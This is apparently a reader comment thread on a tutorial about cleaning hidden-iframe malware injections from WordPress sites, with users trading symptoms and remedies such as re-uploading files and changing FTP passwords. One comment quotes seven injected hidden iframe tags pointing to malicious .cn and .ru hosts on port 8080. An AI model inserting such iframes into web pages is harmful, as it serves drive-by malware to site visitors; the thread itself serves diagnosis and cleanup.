great tutorial!
this info should help others with other infections
great one. i am encountering the same problem but different type (install iframe – .ru domain site with port 8080)
with my WordPress blogs.
they are modifying my wordpress index.php, default-filters.php and theme’s/index.php, and a framer virus was detected by avg8,
which resulted to a php error message.
My Quick solution:
re-upload:
index.php, wp-includes/default-filters.php and your theme template/index.php
Hi,
after reading your post I am wondering if my index.php page has something like that too:
<iframe src=”http://globalmixgroup.cn:8080/ts/in.cgi?pepsi65″ width=125 height=125 style=”visibility:
<iframe src=”http://bigtopstudios.cn:8080/index.php” width=194 height=193 style=”visibility:
<iframe src=”http://beachhousename.cn:8080/index.php” width=189 height=160 style=”visibility
<iframe src=”http://namemartfilmlife.cn:8080/index.php” width=135 height=159 style=”visibilit
<iframe src=”http://shopmovielife.cn:8080/index.php” width=113 height=136 style=”visibili
<iframe src=”http://coolnamemart.cn:8080/index.php” width=113 height=118 style=”visibil
<iframe src=”http://b6t.ru:8080/index.php” width=151 height=154 style=”visibility: hidden”></iframe>
@vertexmarketing,
It’s definitely not right for you to have all those iframes in there.
The way these scripts work; however, the problem is potentially not in the index.php file, but rather inserted by a script. I would go through the instructions on my site to use AdBlock Plus to see exactly what scripts are running on your site.
Unfortunately the malicious scripts can easily be obfuscated so that doing a search (e.g. for “globalmixgroup.cn”) won’t reveal anything. Instead, what you should do is use AdBlock Plus to selectively disable the scripts until you find the one that is injecting the iframes.
Once you’ve narrowed down the script, you can either remove the bad code (you kinda need to know what you’re looking for) or just copy a “good” version of the offending script back to your site.
ambanmba
You rock for putting this together. I just followed your instructions and cleaned up a site that this happened to.
Much appreciated!
Good Job! Thanks. This is why i love WordPress…
I’m facing the same problem as nazcar. Even though I’ve upgraded my wordpress version to 2.8.2 and had replaced all the infected index.php file for more than 5 times in past 2 weeks but the problem keeps repeating.
It had been more than 2 weeks, and yesterday my site was once again attacked. I haven’t replace the infected php files yet. You can see that my site is currently getting the warning and parsing error from the injected php files.
How did the injection took place in version 2.8.2? Any solution?
My site is azmitaufik.com
Thanks.
@azmitaufik
I would try changing all your passwords (WordPress, Hosting admin panel, myPHP, FTP, etc.) People could be getting in behind WordPress if they know the password to the back-end of your site.
ambanmba
@azmitaufik
your computer is infected with malwares..its a malware that steals ftp passwords and inject codes on your files. i suggest you try to scan your system with http://www.malwarebytes.org/
then change your ftp password..
system registry are also infected by malware, i suggest you also do a registry scan..
For now, i am using my web host provider’s online FTP
Hi. Can someone tell me what version this is affecting?
Thanks.
@t3ch33, it doesn’t affect a specific version of WordPress. I’ve found that various plugins are vulnerable.
@t3ch33 it affects all the files with index*, main* default* in your website.
how do they infect the blog? by ftp or holes in worpress php’s?
cause my passwords all are min of 12 chars with chars like ‘\*&*^% and so on..so how do they modify your files?? By cracking your passwords or what?
and if not by ftp -so all yu have to do is chmod your php files to 444 and it will fix it 😀 and disable chmod function in php.ini so they can’t execute it in php.
These attacks are carried out by someone with your FTP credentials. Change all your passwords & reinstall Windows. The infections are *very* difficult to remove and it’s likely you’ll be unable to remove everything they’ve installed on your system.
I don’t know if this is it, but I’ve been toying with various plugins to try to get avatars working for my students who will be users soon, and after installing the plugin *user photo* I started having this error message pop up – first on my user profile screen after attempting to upload a pic, and then all over my site, on various pages. Not all of them, but on user profiles and on one not all of my pages.
Now I have deleted that plugin, and the error remains on my “policies” page.
I’m at a lost of what to do, that permission thing is so tacky!
